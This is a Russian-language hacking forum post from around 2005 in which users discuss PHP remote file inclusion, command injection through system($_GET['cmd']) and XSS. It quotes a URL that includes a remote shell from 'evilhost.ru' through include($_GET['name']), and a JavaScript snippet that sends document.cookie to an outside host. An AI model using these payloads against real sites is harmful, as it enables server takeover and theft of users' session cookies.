cybermind
Сообщений: 805
Оценки: 0
Присоединился: 2004-05-24 20:16:13
|
quote:
—————-<BR>Цитата: Дата:18.04.2005 12:26:09, Автор:Nightfly :: Или я дурак или вы гоните - для юзания пхп-инжекшена вида<BR><BR>http://somesite.com/index.php?name=http://evilhost.ru/shell.php<BR><BR>с синтаксической конструкцией вида include($_GET['name']);<BR><BR>Принципиально пофигу поддержка пхп, нужно чтобы хосты выдавал сорц скрипта а не уже отработанный результат - так что никто не мешает инклуднуть вобще что-то типа <BR><BR>http://somesite.com/index.php?name=http://evilhost.ru/shell.txt (как я как правило и делаю) —————-
Что ему надо я, честно говоря, так и не врубился. Если он пишет про стоку http://brodiaga.nm.ru/cmd.php?cmd=ls, то это не инклуд баг, а system-баг, где должна быть строка system($_GET['cmd']); Но вот что я не понял, так это: 1) Причём здесь XSS-баг? XSS - это что-то типа ЯваСкрыптЪ:windоw.open('http://www.123.ru/index.cgi?'+ dосиmеnt.cookie); 2) Причём здесь nm.ru, если там вообще нет php? Этот http://brodiaga.nm.ru вообще вражеский сайт или твой?? Если твой, то чего ты хотел добится выполнением этого запроса???
Я вообще не фтыкаю!
|